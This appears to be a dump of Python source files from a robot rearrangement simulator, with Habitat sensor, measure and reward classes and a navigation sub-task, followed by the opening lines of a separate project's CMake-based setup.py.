def __init__(self, *args, task, **kwargs):
self._task = task
self._sim: RearrangeSim
super(MultiObjSensor, self).__init__(*args, task=task, **kwargs)
def _get_observation_space(self, *args, **kwargs):
n_targets = self._task.get_n_targets()
return spaces.Box(
shape=(n_targets * 3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
@registry.register_sensor
class TargetCurrentSensor(MultiObjSensor):
"""
This is the ground truth object position sensor relative to the robot end-effector coordinate frame.
"""
cls_uuid: str = "obj_goal_pos_sensor"
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
self._sim: RearrangeSim
T_inv = self._sim.robot.ee_transform.inverted()
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
pos = scene_pos[idxs]
for i in range(pos.shape[0]):
pos[i] = T_inv.transform_point(pos[i])
return pos.reshape(-1)
@registry.register_sensor
class TargetStartSensor(MultiObjSensor):
"""
Relative position from end effector to target object
"""
cls_uuid: str = "obj_start_sensor"
def get_observation(self, *args, observations, episode, **kwargs):
self._sim: RearrangeSim
global_T = self._sim.robot.ee_transform
T_inv = global_T.inverted()
pos = self._sim.get_target_objs_start()
return batch_transform_point(pos, T_inv, np.float32).reshape(-1)
class PositionGpsCompassSensor(Sensor):
def __init__(self, *args, sim, task, **kwargs):
self._task = task
self._sim = sim
super().__init__(*args, task=task, **kwargs)
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
n_targets = self._task.get_n_targets()
self._polar_pos = np.zeros(n_targets * 2, dtype=np.float32)
return spaces.Box(
shape=(n_targets * 2,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def _get_positions(self) -> np.ndarray:
raise NotImplementedError("Must override _get_positions")
def get_observation(self, task, *args, **kwargs):
pos = self._get_positions()
robot_T = self._sim.robot.base_transformation
rel_pos = batch_transform_point(pos, robot_T.inverted(), np.float32)
for i, rel_obj_pos in enumerate(rel_pos):
rho, phi = cartesian_to_polar(rel_obj_pos[0], rel_obj_pos[1])
self._polar_pos[(i * 2) : (i * 2) + 2] = [rho, -phi]
return self._polar_pos
@registry.register_sensor
class TargetStartGpsCompassSensor(PositionGpsCompassSensor):
cls_uuid: str = "obj_start_gps_compass"
def _get_uuid(self, *args, **kwargs):
return TargetStartGpsCompassSensor.cls_uuid
def _get_positions(self) -> np.ndarray:
return self._sim.get_target_objs_start()
@registry.register_sensor
class TargetGoalGpsCompassSensor(PositionGpsCompassSensor):
cls_uuid: str = "obj_goal_gps_compass"
def _get_uuid(self, *args, **kwargs):
return TargetGoalGpsCompassSensor.cls_uuid
def _get_positions(self) -> np.ndarray:
_, pos = self._sim.get_targets()
return pos
@registry.register_sensor
class AbsTargetStartSensor(MultiObjSensor):
"""
    Absolute start positions of the target objects (no end-effector transform applied)
"""
cls_uuid: str = "abs_obj_start_sensor"
def get_observation(self, observations, episode, *args, **kwargs):
pos = self._sim.get_target_objs_start()
return pos.reshape(-1)
@registry.register_sensor
class GoalSensor(MultiObjSensor):
"""
Relative to the end effector
"""
cls_uuid: str = "obj_goal_sensor"
def get_observation(self, observations, episode, *args, **kwargs):
global_T = self._sim.robot.ee_transform
T_inv = global_T.inverted()
_, pos = self._sim.get_targets()
return batch_transform_point(pos, T_inv, np.float32).reshape(-1)
@registry.register_sensor
class AbsGoalSensor(MultiObjSensor):
cls_uuid: str = "abs_obj_goal_sensor"
def get_observation(self, *args, observations, episode, **kwargs):
_, pos = self._sim.get_targets()
return pos.reshape(-1)
@registry.register_sensor
class JointSensor(Sensor):
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return "joint"
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
return spaces.Box(
shape=(config.DIMENSIONALITY,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
joints_pos = self._sim.robot.arm_joint_pos
return np.array(joints_pos, dtype=np.float32)
@registry.register_sensor
class JointVelocitySensor(Sensor):
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return "joint_vel"
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, config, **kwargs):
return spaces.Box(
shape=(config.DIMENSIONALITY,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
joints_pos = self._sim.robot.arm_velocity
return np.array(joints_pos, dtype=np.float32)
@registry.register_sensor
class EEPositionSensor(Sensor):
cls_uuid: str = "ee_pos"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
@staticmethod
def _get_uuid(*args, **kwargs):
return EEPositionSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
trans = self._sim.robot.base_transformation
ee_pos = self._sim.robot.ee_transform.translation
local_ee_pos = trans.inverted().transform_point(ee_pos)
return np.array(local_ee_pos)
@registry.register_sensor
class RelativeRestingPositionSensor(Sensor):
cls_uuid: str = "relative_resting_position"
def _get_uuid(self, *args, **kwargs):
return RelativeRestingPositionSensor.cls_uuid
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, task, *args, **kwargs):
base_trans = self._sim.robot.base_transformation
ee_pos = self._sim.robot.ee_transform.translation
local_ee_pos = base_trans.inverted().transform_point(ee_pos)
relative_desired_resting = task.desired_resting - local_ee_pos
return np.array(relative_desired_resting, dtype=np.float32)
@registry.register_sensor
class RestingPositionSensor(Sensor):
"""
Desired resting position in the robot coordinate frame.
"""
cls_uuid: str = "resting_position"
def _get_uuid(self, *args, **kwargs):
return RestingPositionSensor.cls_uuid
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(3,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, task, *args, **kwargs):
return np.array(task.desired_resting)
@registry.register_sensor
class LocalizationSensor(Sensor):
cls_uuid = "localization_sensor"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return LocalizationSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(
shape=(4,),
low=np.finfo(np.float32).min,
high=np.finfo(np.float32).max,
dtype=np.float32,
)
def get_observation(self, observations, episode, *args, **kwargs):
T = self._sim.robot.base_transformation
forward = np.array([1.0, 0, 0])
heading = np.array(T.transform_vector(forward))
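        # Project the forward and heading vectors onto the x-z ground plane (y is up)
        # and recover a signed yaw angle, using the cross product for the sign.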
forward = forward[[0, 2]]
heading = heading[[0, 2]]
heading_angle = get_angle(forward, heading)
c = np.cross(forward, heading) < 0
if not c:
heading_angle = -1.0 * heading_angle
return np.array([*T.translation, heading_angle], dtype=np.float32)
@registry.register_sensor
class IsHoldingSensor(Sensor):
"""
    Binary indicator of whether the robot is holding an object or is grasping an articulated object.
"""
cls_uuid: str = "is_holding"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return IsHoldingSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(shape=(1,), low=0, high=1, dtype=np.float32)
def get_observation(self, observations, episode, *args, **kwargs):
return np.array(int(self._sim.grasp_mgr.is_grasped)).reshape((1,))
@registry.register_measure
class ObjectToGoalDistance(Measure):
"""
Euclidean distance from the target object to the goal.
"""
cls_uuid: str = "object_to_goal_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ObjectToGoalDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, **kwargs):
idxs, goal_pos = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
target_pos = scene_pos[idxs]
distances = np.linalg.norm(target_pos - goal_pos, ord=2, axis=-1)
self._metric = {str(idx): dist for idx, dist in zip(idxs, distances)}
@registry.register_measure
class ObjAtGoal(Measure):
"""
    Returns whether each target object in the scene is at its goal position
    (binary), keyed by target index.
"""
cls_uuid: str = "obj_at_goal"
def __init__(self, *args, sim, config, task, **kwargs):
self._config = config
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ObjAtGoal.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
ObjectToGoalDistance.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
obj_to_goal_dists = task.measurements.measures[
ObjectToGoalDistance.cls_uuid
].get_metric()
self._metric = {
str(idx): dist < self._config.SUCC_THRESH
for idx, dist in obj_to_goal_dists.items()
}
@registry.register_measure
class EndEffectorToObjectDistance(Measure):
"""
Gets the distance between the end-effector and all current target object COMs.
"""
cls_uuid: str = "ee_to_object_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return EndEffectorToObjectDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, **kwargs):
ee_pos = self._sim.robot.ee_transform.translation
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
target_pos = scene_pos[idxs]
distances = np.linalg.norm(target_pos - ee_pos, ord=2, axis=-1)
self._metric = {str(idx): dist for idx, dist in zip(idxs, distances)}
@registry.register_measure
class EndEffectorToRestDistance(Measure):
"""
Distance between current end effector position and position where end effector rests within the robot body.
"""
cls_uuid: str = "ee_to_rest_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return EndEffectorToRestDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, task, observations, **kwargs):
to_resting = observations[RelativeRestingPositionSensor.cls_uuid]
rest_dist = np.linalg.norm(to_resting)
self._metric = rest_dist
@registry.register_measure
class ReturnToRestDistance(Measure):
"""
    Distance between the end-effector and the resting position if the robot is holding the correct object; otherwise the distance from the target object to the resting position.
"""
cls_uuid: str = "return_to_rest_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ReturnToRestDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, task, observations, **kwargs):
to_resting = observations[RelativeRestingPositionSensor.cls_uuid]
rest_dist = np.linalg.norm(to_resting)
snapped_id = self._sim.grasp_mgr.snap_idx
abs_targ_obj_idx = self._sim.scene_obj_ids[task.abs_targ_idx]
picked_correct = snapped_id == abs_targ_obj_idx
if picked_correct:
self._metric = rest_dist
else:
T_inv = self._sim.robot.ee_transform.inverted()
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
pos = scene_pos[idxs][0]
pos = T_inv.transform_point(pos)
self._metric = np.linalg.norm(task.desired_resting - pos)
@registry.register_measure
class RobotCollisions(Measure):
"""
Returns a dictionary with the counts for different types of collisions.
"""
cls_uuid: str = "robot_collisions"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return RobotCollisions.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._accum_coll_info = CollisionDetails()
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
cur_coll_info = self._task.get_cur_collision_info()
self._accum_coll_info += cur_coll_info
self._metric = {
"total_collisions": self._accum_coll_info.total_collisions,
"robot_obj_colls": self._accum_coll_info.robot_obj_colls,
"robot_scene_colls": self._accum_coll_info.robot_scene_colls,
"obj_scene_colls": self._accum_coll_info.obj_scene_colls,
}
@registry.register_measure
class RobotForce(Measure):
"""
    The accumulated force, in newtons, applied by the robot over the episode.
"""
cls_uuid: str = "robot_force"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return RobotForce.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._accum_force = 0.0
self._prev_force = None
self._cur_force = None
self._add_force = None
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
@property
def add_force(self):
return self._add_force
def update_metric(self, *args, episode, task, observations, **kwargs):
robot_force, _, overall_force = self._task.get_coll_forces()
if self._task._config.COUNT_OBJ_COLLISIONS:
self._cur_force = overall_force
else:
self._cur_force = robot_force
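        # Only force increases above MIN_FORCE are added to the accumulator; a drop in
        # force resets the baseline without contributing to the accumulated total.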
if self._prev_force is not None:
self._add_force = self._cur_force - self._prev_force
if self._add_force > self._config.MIN_FORCE:
self._accum_force += self._add_force
self._prev_force = self._cur_force
elif self._add_force < 0.0:
self._prev_force = self._cur_force
else:
self._add_force = 0.0
else:
self._prev_force = self._cur_force
self._add_force = 0.0
self._metric = self._accum_force
@registry.register_measure
class NumStepsMeasure(Measure):
"""
The number of steps elapsed in the current episode.
"""
cls_uuid: str = "num_steps"
@staticmethod
def _get_uuid(*args, **kwargs):
return NumStepsMeasure.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._metric = 0
def update_metric(self, *args, episode, task, observations, **kwargs):
self._metric += 1
@registry.register_measure
class ForceTerminate(Measure):
"""
If the accumulated force throughout this episode exceeds the limit.
"""
cls_uuid: str = "force_terminate"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ForceTerminate.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
RobotForce.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
accum_force = task.measurements.measures[
RobotForce.cls_uuid
].get_metric()
if (
self._config.MAX_ACCUM_FORCE > 0
and accum_force > self._config.MAX_ACCUM_FORCE
):
rearrange_logger.debug(
f"Force threshold={self._config.MAX_ACCUM_FORCE} exceeded with {accum_force}, ending episode"
)
self._task.should_end = True
self._metric = True
else:
self._metric = False
@registry.register_measure
class DidViolateHoldConstraintMeasure(Measure):
cls_uuid: str = "did_violate_hold_constraint"
@staticmethod
def _get_uuid(*args, **kwargs):
return DidViolateHoldConstraintMeasure.cls_uuid
def __init__(self, *args, sim, **kwargs):
self._sim = sim
super().__init__(*args, sim=sim, **kwargs)
def reset_metric(self, *args, episode, task, observations, **kwargs):
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, **kwargs):
self._metric = self._sim.grasp_mgr.is_violating_hold_constraint()
class RearrangeReward(Measure):
"""
An abstract class defining some measures that are always a part of any
reward function in the Habitat 2.0 tasks.
"""
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
RobotForce.cls_uuid,
ForceTerminate.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
reward = 0.0
reward += self._get_coll_reward()
if self._sim.grasp_mgr.is_violating_hold_constraint():
reward -= self._config.CONSTRAINT_VIOLATE_PEN
force_terminate = task.measurements.measures[
ForceTerminate.cls_uuid
].get_metric()
if force_terminate:
reward -= self._config.FORCE_END_PEN
self._metric = reward
def _get_coll_reward(self):
reward = 0
force_metric = self._task.measurements.measures[RobotForce.cls_uuid]
# Penalize the force that was added to the accumulated force at the
# last time step.
reward -= max(
            0,  # clamp so the penalty never goes negative
min(
self._config.FORCE_PEN * force_metric.add_force,
self._config.MAX_FORCE_PEN,
),
)
return reward
```
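New sensors follow the same pattern as the classes above: register with the registry, expose a `cls_uuid`, and implement the observation space and `get_observation`. A minimal hypothetical example (the class name and uuid are illustrative, not part of the codebase):
```python
import numpy as np
from gym import spaces
from habitat.core.registry import registry
from habitat.core.simulator import Sensor, SensorTypes
@registry.register_sensor
class BasePositionSensor(Sensor):
    """Absolute robot base position in world coordinates (illustrative only)."""
    cls_uuid: str = "base_pos"
    def __init__(self, sim, config, *args, **kwargs):
        super().__init__(config=config)
        self._sim = sim
    def _get_uuid(self, *args, **kwargs):
        return BasePositionSensor.cls_uuid
    def _get_sensor_type(self, *args, **kwargs):
        return SensorTypes.TENSOR
    def _get_observation_space(self, *args, **kwargs):
        return spaces.Box(
            shape=(3,),
            low=np.finfo(np.float32).min,
            high=np.finfo(np.float32).max,
            dtype=np.float32,
        )
    def get_observation(self, observations, episode, *args, **kwargs):
        return np.array(
            self._sim.robot.base_transformation.translation, dtype=np.float32
        )
```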
#### File: rearrange/sub_tasks/nav_to_obj_task.py
```python
import os.path as osp
import random
from collections import defaultdict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
import magnum as mn
import numpy as np
from habitat.core.dataset import Episode
from habitat.core.registry import registry
from habitat.tasks.rearrange.multi_task.pddl_domain import PddlDomain
from habitat.tasks.rearrange.multi_task.rearrange_pddl import (
PddlAction,
RearrangeObjectTypes,
search_for_id,
)
from habitat.tasks.rearrange.multi_task.task_creator_utils import (
create_task_object,
)
from habitat.tasks.rearrange.rearrange_task import ADD_CACHE_KEY, RearrangeTask
from habitat.tasks.rearrange.utils import CacheHelper, rearrange_logger
DYN_NAV_TASK_NAME = "RearrangeNavToObjTask-v0"
@dataclass
class NavToInfo:
"""
:property nav_target_pos: Where the robot should navigate to.
:property nav_target_angle: What angle the robot should be at when at the goal.
:property nav_to_task_name: The name of the sub-task we are navigating to.
    :property nav_to_obj_type: All sub-tasks are assumed to be interacting with
    some object. This is the object the sub-task we are navigating to is
    defined relative to.
    :property start_hold_obj_idx: If not None, the scene object index the robot
    starts the episode holding.
    :property start_base_pos: Cached starting position of the robot base.
    :property start_base_rot: Cached starting rotation of the robot base.
    """
nav_target_pos: mn.Vector3
nav_target_angle: float
nav_to_task_name: str
nav_to_obj_type: RearrangeObjectTypes
    start_hold_obj_idx: Optional[int] = None
start_base_pos: Optional[mn.Vector3] = None
start_base_rot: Optional[float] = None
@registry.register_task(name=DYN_NAV_TASK_NAME)
class DynNavRLEnv(RearrangeTask):
"""
:_nav_to_info: Information about the next skill we are navigating to.
"""
def __init__(self, *args, config, dataset=None, **kwargs):
super().__init__(config=config, *args, dataset=dataset, **kwargs)
self.force_obj_to_idx = None
self.force_recep_to_name = None
self._prev_measure = 1.0
data_path = dataset.config.DATA_PATH.format(split=dataset.config.SPLIT)
fname = data_path.split("/")[-1].split(".")[0]
save_dir = osp.dirname(data_path)
self.cache = CacheHelper(
osp.join(save_dir, f"{fname}_{config.TYPE}_start.pickle"),
def_val={},
verbose=False,
)
self.start_states = self.cache.load()
self.domain = None
self._nav_to_info: Optional[NavToInfo] = None
@property
def nav_to_obj_type(self):
return self._nav_to_info.nav_to_obj_type
@property
def nav_to_task_name(self):
return self._nav_to_info.nav_to_task_name
@property
def nav_target_pos(self):
return self._nav_to_info.nav_target_pos
@property
def nav_target_angle(self):
return self._nav_to_info.nav_target_angle
def set_args(self, obj, **kwargs):
if "marker" in kwargs:
self.force_recep_to_name = kwargs["orig_applied_args"]["marker"]
self.force_obj_to_idx = obj
self.force_obj_to_name = kwargs["orig_applied_args"]["obj"]
self.force_kwargs = kwargs
def _get_allowed_tasks(
self, filter_actions: Optional[List[str]] = None
) -> Dict[str, List[PddlAction]]:
"""
:returns: Mapping the action name to the grounded instances of the action that are possible in the current state.
"""
cur_preds = self.domain.get_true_predicates()
# Get all actions which can be actively applied.
allowed_actions = defaultdict(list)
for action in self.domain.actions.values():
if (
filter_actions is not None
and action.name not in filter_actions
):
continue
if action.task == DYN_NAV_TASK_NAME or (
len(self._config.FILTER_NAV_TO_TASKS) != 0
and action.name not in self._config.FILTER_NAV_TO_TASKS
):
continue
consistent_actions = action.get_possible_actions(
cur_preds, self.domain.get_name_to_id_mapping()
)
rearrange_logger.debug(
f"For {action.name} got consistent actions:"
)
            for grounded_action in consistent_actions:
                rearrange_logger.debug(f"- {grounded_action}")
                allowed_actions[grounded_action.name].append(grounded_action)
return allowed_actions
def _get_nav_targ(
self, task_name: str, task_args: Dict[str, Any], episode: Episode
) -> Tuple[mn.Vector3, float, RearrangeObjectTypes]:
rearrange_logger.debug(
f"Getting nav target for {task_name} with arguments {task_args}"
)
# Get the config for this task
action = self.domain.get_task_match_for_name(task_name)
rearrange_logger.debug(
f"Corresponding action with task={action.task}, task_def={action.task_def}, config_task_args={action.config_task_args}"
)
orig_state = self._sim.capture_state(with_robot_js=True)
create_task_object(
action.task,
action.task_def,
self._config.clone(),
self,
self._dataset,
False,
task_args,
episode,
action.config_task_args,
)
robo_pos = self._sim.robot.base_pos
heading_angle = self._sim.robot.base_rot
self._sim.set_state(orig_state, set_hold=True)
_, obj_to_type = search_for_id(
task_args["orig_obj"], self.domain.get_name_to_id_mapping()
)
return robo_pos, heading_angle, obj_to_type
def _generate_snap_to_obj(self) -> int:
# Snap the target object to the robot hand.
target_idxs, _ = self._sim.get_targets()
return self._sim.scene_obj_ids[target_idxs[0]]
def _generate_nav_start_goal(self, episode) -> NavToInfo:
start_hold_obj_idx: Optional[int] = None
        # With some probability, start the episode already holding an object snapped to the hand.
if random.random() < self._config.OBJECT_IN_HAND_SAMPLE_PROB:
start_hold_obj_idx = self._generate_snap_to_obj()
allowed_tasks = self._get_allowed_tasks()
nav_to_task_name = random.choice(list(allowed_tasks.keys()))
task = random.choice(allowed_tasks[nav_to_task_name])
target_pos, target_angle, obj_type = self._get_nav_targ(
nav_to_task_name,
{
**task.task_args,
ADD_CACHE_KEY: "nav",
},
episode,
)
rearrange_logger.debug(f"Got nav to skill {nav_to_task_name}")
target_pos = np.array(self._sim.safe_snap_point(target_pos))
start_pos, start_rot = get_robo_start_pos(self._sim, target_pos)
return NavToInfo(
nav_target_pos=target_pos,
nav_target_angle=float(target_angle),
nav_to_task_name=nav_to_task_name,
nav_to_obj_type=obj_type,
start_hold_obj_idx=start_hold_obj_idx,
start_base_pos=start_pos,
start_base_rot=start_rot,
)
def _get_force_nav_start_info(self, episode: Episode) -> NavToInfo:
rearrange_logger.debug(
f"Navigation getting target for {self.force_obj_to_idx} with task arguments {self.force_kwargs}"
)
name_to_id = self.domain.get_name_to_id_mapping()
if self.force_recep_to_name is not None:
rearrange_logger.debug(
f"Forcing receptacle {self.force_recep_to_name}"
)
_, entity_type = search_for_id(
self.force_recep_to_name, name_to_id
)
use_name = self.force_recep_to_name
else:
_, entity_type = search_for_id(self.force_obj_to_name, name_to_id)
use_name = self.force_obj_to_name
rearrange_logger.debug(
f"Search object name {use_name} with type {entity_type}"
)
matching_skills = self.domain.get_matching_skills(
entity_type, use_name
)
allowed_tasks = self._get_allowed_tasks(matching_skills)
if len(allowed_tasks) == 0:
raise ValueError(
f"Got no allowed tasks {allowed_tasks} from {matching_skills}, {entity_type}, {use_name}"
)
filtered_allowed_tasks = []
orig_args = self.force_kwargs["orig_applied_args"]
for sub_allowed_tasks in allowed_tasks.values():
for task in sub_allowed_tasks:
assigned_args = task.task_args
# Check that `orig_args` is a SUBSET of `assigned_args` meaning
# the keys and values match something in assigned args.
is_orig_args_subset = all(
[
assigned_args.get(k, None) == v
or assigned_args.get(f"orig_{k}", None) == v
for k, v in orig_args.items()
]
)
if is_orig_args_subset:
filtered_allowed_tasks.append(task)
rearrange_logger.debug(f"Got allowed tasks {filtered_allowed_tasks}")
if len(filtered_allowed_tasks) == 0:
allowed_tasks_str = (
"".join(["\n - " + x for x in allowed_tasks]) + "\n"
)
raise ValueError(
f"Got no tasks out of {allowed_tasks_str}. With entity_type={entity_type}, use_name={use_name} force kwargs={self.force_kwargs}"
)
nav_to_task = filtered_allowed_tasks[0]
rearrange_logger.debug(
f"Navigating to {nav_to_task.name} with arguments {nav_to_task.task_args}"
)
targ_pos, nav_target_angle, obj_type = self._get_nav_targ(
nav_to_task.name, nav_to_task.task_args, episode
)
return NavToInfo(
nav_target_pos=np.array(self._sim.safe_snap_point(targ_pos)),
nav_target_angle=float(nav_target_angle),
nav_to_task_name=nav_to_task.name,
nav_to_obj_type=obj_type,
)
def reset(self, episode: Episode):
sim = self._sim
super().reset(episode, fetch_observations=False)
rearrange_logger.debug("Resetting navigation task")
if self.domain is None:
self.domain = PddlDomain(
self._config.PDDL_DOMAIN_DEF,
self._dataset,
self._config,
self._sim,
)
else:
self.domain.reset()
episode_id = sim.ep_info["episode_id"]
if self.force_obj_to_idx is not None:
full_key = (
f"{episode_id}_{self.force_obj_to_idx}_{self.force_kwargs}"
)
if (
full_key in self.start_states
and not self._config.FORCE_REGENERATE
):
self._nav_to_info = self.start_states[full_key]
rearrange_logger.debug(
f"Forcing episode, loaded `{full_key}` from cache {self.cache.cache_id}."
)
if not isinstance(self._nav_to_info, NavToInfo):
rearrange_logger.warning(
f"Incorrect cache saved to file {self._nav_to_info}. Regenerating now."
)
self._nav_to_info = None
if self._nav_to_info is None:
self._nav_to_info = self._get_force_nav_start_info(episode)
self.start_states[full_key] = self._nav_to_info
if self._config.SHOULD_SAVE_TO_CACHE:
self.cache.save(self.start_states)
rearrange_logger.debug(
f"Forcing episode, saved key `{full_key}` to cache {self.cache.cache_id}."
)
else:
if (
episode_id in self.start_states
and not self._config.FORCE_REGENERATE
):
self._nav_to_info = self.start_states[episode_id]
if (
not isinstance(self._nav_to_info, NavToInfo)
or self._nav_to_info.start_base_pos is None
or self._nav_to_info.start_base_rot is None
):
rearrange_logger.warning(
f"Incorrect cache saved to file {self._nav_to_info}. Regenerating now."
)
self._nav_to_info = None
else:
rearrange_logger.debug(
f"Loaded episode from cache {self.cache.cache_id}."
)
if (
self._nav_to_info is not None
and self._nav_to_info.start_hold_obj_idx is not None
):
# The object to hold was generated from stale object IDs.
# Reselect a new object to hold.
self._nav_to_info.start_hold_obj_idx = (
self._generate_snap_to_obj()
)
if self._nav_to_info is None:
self._nav_to_info = self._generate_nav_start_goal(episode)
self.start_states[episode_id] = self._nav_to_info
if self._config.SHOULD_SAVE_TO_CACHE:
self.cache.save(self.start_states)
rearrange_logger.debug(
f"Saved episode to cache {self.cache.cache_id}."
)
sim.robot.base_pos = self._nav_to_info.start_base_pos
sim.robot.base_rot = self._nav_to_info.start_base_rot
if self._nav_to_info.start_hold_obj_idx is not None:
if self._sim.grasp_mgr.is_grasped:
raise ValueError(
f"Attempting to grasp {self._nav_to_info.start_hold_obj_idx} even though object is already grasped"
)
rearrange_logger.debug(
f"Forcing to grasp object {self._nav_to_info.start_hold_obj_idx}"
)
self._sim.grasp_mgr.snap_to_obj(
self._nav_to_info.start_hold_obj_idx, force=True
)
rearrange_logger.debug(f"Got nav to info {self._nav_to_info}")
if not sim.pathfinder.is_navigable(self._nav_to_info.nav_target_pos):
rearrange_logger.error("Goal is not navigable")
if self._sim.habitat_config.DEBUG_RENDER:
# Visualize the position the agent is navigating to.
sim.viz_ids["nav_targ_pos"] = sim.visualize_position(
self._nav_to_info.nav_target_pos,
sim.viz_ids["nav_targ_pos"],
r=0.2,
)
return self._get_observations(episode)
def get_robo_start_pos(
sim, nav_targ_pos: mn.Vector3
) -> Tuple[np.ndarray, float]:
orig_state = sim.capture_state()
start_pos, start_rot = sim.set_robot_base_to_random_point(
max_attempts=1000
)
# Reset everything except for the robot state.
orig_state["robot_T"] = None
sim.set_state(orig_state)
return start_pos, start_rot
``` |
{
"source": "Jiayuan-Gu/MPlib",
"score": 2
} |
#### File: Jiayuan-Gu/MPlib/setup.py
```python
import os
import sys
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=""):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
